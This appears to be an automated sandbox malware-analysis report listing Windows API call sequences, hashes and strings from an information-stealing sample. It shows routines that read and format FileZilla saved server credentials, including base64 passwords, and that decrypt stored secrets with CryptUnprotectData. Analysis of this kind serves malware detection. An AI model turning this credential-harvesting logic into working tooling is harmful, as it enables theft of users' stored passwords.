                                          • API String ID: 420147892-0
                                          • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction ID: bed392d1c59406249c2bfdd7b74981ed85f29ea5f5ccd7a468ab886350c018da
                                          • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                          • Instruction Fuzzy Hash: D201E979A60208FBDB20DFE4CD54BEDB7F9EF49700F404189A506A6254D7749A80DF51
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022DE709
                                          • StrCmpCA.SHLWAPI(?,004214F8), ref: 022DE759
                                          • StrCmpCA.SHLWAPI(?,004214FC), ref: 022DE76F
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022DEE46
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                          • String ID:
                                          • API String ID: 433455689-0
                                          • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                          • Instruction ID: 07d7e41e9441e3eff96cbb0616cc400a0e0e92a08ac28931d7856870c11a89eb
                                          • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                          • Instruction Fuzzy Hash: B412DA71A203189BCF18FBA4DD95EFD737AAFA4300F8041ADA50B56198EE345B88DF51
                                          APIs
                                          • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                          • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                          APIs
                                          • CryptBinaryToStringA.CRYPT32(00000000,022D53EB,40000001,00000000,00000000,?,022D53EB), ref: 022E9127
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction ID: 622d2ef8113f0193da235df1660f906510042ef9c57664332be7fcb04a29c989
                                          • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                          • Instruction Fuzzy Hash: DF11DD74214205BFDF00CF94DC89FAA33AAAF89754F409559FD0A8F264D775E881EB60
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                          • LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptLocalString$AllocFree
                                          • String ID:
                                          • API String ID: 4291131564-0
                                          • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction ID: f1e0d2950fb66c37afa73a8a57ec2a713583f5a14ecf84620eb785c2c8bedc6a
                                          • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                          • Instruction Fuzzy Hash: 8611A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208058FD159B394C776A941CB90
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                          • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                          • LocalFree.KERNEL32(?), ref: 00409BD3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                          • String ID:
                                          • API String ID: 3243516280-0
                                          • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                          • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022D9DEB
                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 022D9E0A
                                          • memcpy.MSVCRT(?,?,?), ref: 022D9E2D
                                          • LocalFree.KERNEL32(?), ref: 022D9E3A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                          • String ID:
                                          • API String ID: 3243516280-0
                                          • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction ID: d9f662d17a182aba864762757bef7205fdf38135c504fd4ba0f7128c44408f0a
                                          • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                          • Instruction Fuzzy Hash: 7D1109B8A00209EFDB04CFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0097B468,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0097B468,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0097B468,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                          • wsprintfA.USER32 ref: 00417AB7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                          • String ID:
                                          • API String ID: 362916592-0
                                          • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                          • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                          • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                          APIs
                                          • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID:
                                          • API String ID: 123533781-0
                                          • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                          • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                          • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                          • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$GetProcAddress.$l
                                          • API String ID: 0-2784972518
                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction ID: 7a7252b41ec6c3a8c5e65a14dfc705917c9624575457a02fffa1364ef6503cdb
                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                          • Instruction Fuzzy Hash: 183139B6910609DFDB20CF99C880AEEBBF5FF48724F15404AD441A7264D7B1EA45CBA4
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022DF985
                                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 022DF9D6
                                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 022DF9EC
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022DFD18
                                          • FindClose.KERNEL32(000000FF), ref: 022DFD2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID:
                                          • API String ID: 3334442632-0
                                          • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                          • Instruction ID: 02e32bd03135c8904990f4c3068a6781f6d0d5d246d2c18365d8a2a58b6c29c3
                                          • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                          • Instruction Fuzzy Hash: 0E119D3182034CABCF28EBE0DD549ED7336AB60300F8042AAA50B56695EF342B48DF41
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                          • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022ED156
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                          • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                          • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220068769.000000000094D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_94d000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction ID: 9122f07521d28cb79a1085a1bd8d56b0cb43c80347e57b01d2ecae65e5b2e204
                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction Fuzzy Hash: AC1170B23401009FDB54DF55DC81FA673EAFB98364B298155E904CB316E675E801C760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction ID: b3384d38f6e074f45c5f91d2b811c2238e5bed16dec30f53c6b0da12868abc93
                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction Fuzzy Hash: 19012B726206008FDF21CFB0C804FAA33F9FB86305F1540B9E906D7296E370AA41CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                          • Instruction ID: 73b83034997c00ce190831bab7256bad9184d10151853065d219d92f9c26525e
                                          • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                          • Instruction Fuzzy Hash: 5071C131471B80EBDF6B3BB1DD01F8E7AA3BF04702F904924B1DB295749E226865BE51
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • strtok_s.MSVCRT ref: 0041031B
                                          • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                          • lstrlenA.KERNEL32(00000000), ref: 00410393
                                            • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                            • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                          • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                          • lstrlenA.KERNEL32(00000000), ref: 00410427
                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                          • lstrlenA.KERNEL32(00000000), ref: 00410475
                                          • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                          • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                          • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                          • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                          • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                          • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                          • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                          • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                          • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                          • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                          • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                          • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                          • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                          • strtok_s.MSVCRT ref: 00410679
                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                          • memset.MSVCRT ref: 004106DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                          • API String ID: 337689325-514892060
                                          • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                          • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                          • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                          • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                          APIs
                                          • lstrlen.KERNEL32(00424DA0), ref: 022D4833
                                          • lstrlen.KERNEL32(00424E50), ref: 022D483E
                                          • lstrlen.KERNEL32(00424F18), ref: 022D4849
                                          • lstrlen.KERNEL32(00424FD0), ref: 022D4854
                                          • lstrlen.KERNEL32(00425078), ref: 022D485F
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 022D486E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D4875
                                          • lstrlen.KERNEL32(00425120), ref: 022D4883
                                          • lstrlen.KERNEL32(004251C8), ref: 022D488E
                                          • lstrlen.KERNEL32(00425270), ref: 022D4899
